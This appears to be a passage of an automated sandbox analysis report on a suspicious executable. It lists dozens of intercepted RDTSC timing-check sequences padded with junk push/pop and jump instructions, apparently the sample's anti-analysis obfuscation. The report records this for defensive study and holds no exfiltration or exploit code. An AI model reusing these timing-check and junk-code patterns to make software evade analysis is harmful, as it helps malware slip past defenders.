Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C922F2 second address: C92325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Fh 0x00000007 pushad 0x00000008 jno 00007FBCB0E4CF66h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FBCB0E4CF73h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C929BB second address: C929C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FBCB0ED65F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C929C5 second address: C929E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCB0E4CF72h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C929E5 second address: C929E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C929E9 second address: C92A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF71h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FBCB0E4CF6Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C0E6A7 second address: C0E6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C0E6AD second address: C0E6B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C0E6B6 second address: C0E6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C0E6BC second address: C0E6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C0E6C0 second address: C0E6C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C973C7 second address: C973D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C989DF second address: C989E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C989E5 second address: C989E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C989E9 second address: C98A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6606h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C9ECF5 second address: C9ED16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C9ED16 second address: C9ED1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C9ED1A second address: C9ED2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FBCB0E4CF66h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C9ED2D second address: C9ED37 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBCB0ED65F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C9ED37 second address: C9ED4B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBCB0E4CF6Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA1A1C second address: CA1A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA1A21 second address: CA1A42 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBCB0E4CF6Ch 0x00000008 je 00007FBCB0E4CF6Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA1B59 second address: CA1B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jbe 00007FBCB0ED65F6h 0x00000010 pop eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 je 00007FBCB0ED65F6h 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FBCB0ED6605h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA1B8C second address: CA1B90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA1B90 second address: CA1B96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA1B96 second address: CA1B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA1B9C second address: CA1BA8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA1BA8 second address: CA1BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA1BAC second address: CA1BB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA1CE0 second address: CA1CE5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA76CE second address: CA76D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA76D2 second address: CA7714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF78h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FBCB0E4CF72h 0x00000011 pop ebx 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jp 00007FBCB0E4CF66h 0x0000001c jne 00007FBCB0E4CF66h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA7714 second address: CA771A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA771A second address: CA7732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FBCB0E4CF6Eh 0x0000000c jp 00007FBCB0E4CF66h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA7732 second address: CA7738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA7738 second address: CA773C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA7B53 second address: CA7B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FAh 0x00000007 push ebx 0x00000008 jmp 00007FBCB0ED6600h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA7DD2 second address: CA7DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA7DDD second address: CA7DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA7DE1 second address: CA7DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA7DEB second address: CA7DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA7DF1 second address: CA7DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F756 second address: C4F75A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C4F75A second address: C4F75E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CA8A1B second address: CA8A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CABEB2 second address: CABEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBCB0E4CF66h 0x0000000a jmp 00007FBCB0E4CF79h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CABEDA second address: CABEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAB70E second address: CAB72F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnl 00007FBCB0E4CF66h 0x0000000b jne 00007FBCB0E4CF66h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FBCB0E4CF6Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAB72F second address: CAB747 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBCB0ED65FBh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CABBC2 second address: CABBCF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBCB0E4CF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CABBCF second address: CABBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CABBD5 second address: CABBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C060C1 second address: C060D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED65FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: C060D1 second address: C060DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FBCB0E4CF66h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF497 second address: CAF49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF49D second address: CAF4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF4A4 second address: CAF4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF4AA second address: CAF4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FBCB0E4CF66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF4B6 second address: CAF4C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007FBCB0ED65F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF4C4 second address: CAF4CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF4CF second address: CAF4D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF4D3 second address: CAF4DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF4DF second address: CAF4EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF4EA second address: CAF4F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBCB0E4CF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF4F4 second address: CAF4FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CAF77D second address: CAF7A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Eh 0x00000007 jng 00007FBCB0E4CF66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007FBCB0E4CF6Ch 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB902D second address: CB9038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FBCB0ED65F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB70C0 second address: CB70C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB70C4 second address: CB70D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FBCB0ED65F6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB70D6 second address: CB70DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB70DA second address: CB70E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB70E0 second address: CB70E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB70E6 second address: CB7105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FBCB0ED65F6h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCB0ED6603h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB7B91 second address: CB7BAB instructions: 0x00000000 rdtsc 0x00000002 js 00007FBCB0E4CF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBCB0E4CF6Bh 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB7BAB second address: CB7BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jnp 00007FBCB0ED662Bh 0x0000000c pushad 0x0000000d jmp 00007FBCB0ED65FAh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 ja 00007FBCB0ED65F6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB818D second address: CB81C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FBCB0E4CF77h 0x0000000e popad 0x0000000f jno 00007FBCB0E4CF68h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FBCB0E4CF6Dh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CB81C7 second address: CB81E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0ED6609h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CBDC6C second address: CBDC71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CBDDFB second address: CBDE31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6606h 0x00000007 jmp 00007FBCB0ED6600h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FBCB0ED660Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CBDE31 second address: CBDE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CCBEA0 second address: CCBEA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CCBEA4 second address: CCBECB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Bh 0x00000007 jmp 00007FBCB0E4CF78h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CCA0F6 second address: CCA0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CCA0FC second address: CCA10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBCB0E4CF6Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CCA10E second address: CCA149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBCB0ED6605h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FBCB0ED6608h 0x0000000f popad 0x00000010 jns 00007FBCB0ED65FCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CCA6CE second address: CCA6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FBCB0E4CF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CCA6D8 second address: CCA6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CCA6DC second address: CCA6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FBCB0E4CF74h 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CCAD82 second address: CCAD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD2686 second address: CD26AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007FBCB0E4CF66h 0x0000000c popad 0x0000000d push edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 popad 0x00000012 jng 00007FBCB0E4CF82h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBCB0E4CF6Eh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD26AE second address: CD26B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD2237 second address: CD225F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0E4CF6Eh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCB0E4CF73h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD23D4 second address: CD23E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jnp 00007FBCB0ED65F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD23E4 second address: CD23EA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: CD5F48 second address: CD5F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBCB0ED65F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
